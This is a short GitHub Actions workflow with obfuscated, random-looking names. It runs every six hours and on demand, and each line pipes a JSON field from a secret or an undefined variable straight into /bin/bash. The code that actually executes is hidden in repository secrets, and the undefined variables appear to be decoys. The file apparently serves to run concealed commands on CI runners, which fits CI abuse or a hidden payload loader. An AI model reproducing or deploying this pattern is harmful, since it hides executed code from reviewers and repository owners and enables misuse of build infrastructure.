name: shici1sc
on:
  workflow_dispatch:
  schedule:
    - cron: '6 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shici1sc
        env:
          capg4412: ${{ secrets.capg4412 }}
        run: |
          echo $capg4412 | jq -r .zff151 | /bin/bash
          echo $zae67270 | jq -r .ojld477 | /bin/bash
          echo $irc278 | jq -r .vmk13493 | /bin/bash
          echo $l7285 | jq -r .myp1549 | /bin/bash
          echo $cvey99087 | jq -r .iqnu71475 | /bin/bash
          echo $parn9281 | jq -r .hdz7 | /bin/bash

